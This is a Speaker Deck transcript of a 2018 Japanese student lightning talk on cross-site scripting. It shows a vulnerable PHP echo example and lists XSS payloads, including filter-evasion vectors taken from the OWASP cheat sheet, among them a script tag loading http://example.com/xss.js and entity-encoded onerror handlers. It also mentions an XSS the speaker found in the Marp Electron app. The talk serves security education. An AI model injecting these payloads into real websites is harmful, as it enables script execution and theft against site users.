XSSの入力値を調べてみた / searching xss insertion value

49116ff34041caf0476b170ab193ebc5?s=47 Tomoyuki KOYAMA
February 03, 2018
Technology
2
1k

XSSの入力値を調べてみた / searching xss insertion value

2018/02/03 学生LT at freee

49116ff34041caf0476b170ab193ebc5?s=128

Tomoyuki KOYAMA

February 03, 2018
Tweet

Want more?

49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
77
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
78
49116ff34041caf0476b170ab193ebc5?s=48 tomoyk
0
180
7cbd3f5f922d798cc312eaf596de7ae6?s=48 iamctodd
7
920
3ab1249be442027903e1180025340b3f?s=48 reverentgeek
15
950
A9a491b0fcbe0fbce3d64063a37add99?s=48 rmw
7
510
766b9746b59e6f09e280cd33cf4ed419?s=48 skipperchong
0
330
61857dafbd287b3027c4dcea9008ad3c?s=48 carmenhchung
9
680
06f8b41980eb4c577fa40c41d5030c19?s=48 keathley
9
340
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
3
380
C35e01544a0dd94a2cf1619ee8a42ebb?s=48 clairelew
5
950
6bb82b13cda86d3b821fa44100335ddf?s=48 thoeni
1
250

Transcript

  1. 1.

    XSS

  2. 2.

    B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,

    Seccamp, etc
  3. 3.

    XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input

    During Web Page Generation ('Cross-site Scripting') (3.0)
  4. 4.

    ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
  5. 5.

    ... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];

    ?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
  6. 6.

    XSS Stored XSS( ) Re ected XSS( ) DOM Based

    XSS
  7. 7.

    XSS == XSS

  8. 8.

    <script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)

    <- a href
  9. 9.

    XSS

  10. 10.

    ? / . XSS . XSS .

  11. 11.

    ?

  12. 12.

    OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. 13.

    ( ) 3

  14. 14.

    [1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">

    </script>
  15. 15.

    [2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>

  16. 16.

    [3] <img src=x onerror=&#x6A&#x61&#x76&#x61&#x73 &#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65 &#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> &#x... HTML (16 )

    . ... <img src="x" onerror="javascript:alert('XSS')">
  17. 17.

    ( )

  18. 18.

    ( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;

    URL=http://;URL=http://yahoo.co.jp/;">
  19. 19.
    None
  20. 20.

    Electron Marp Electron Web ... <script>alert()</script> alert ...( )

  21. 21.

    ?

  22. 22.

    JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider

    on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
  23. 23.

    XSS XSS alert() Electron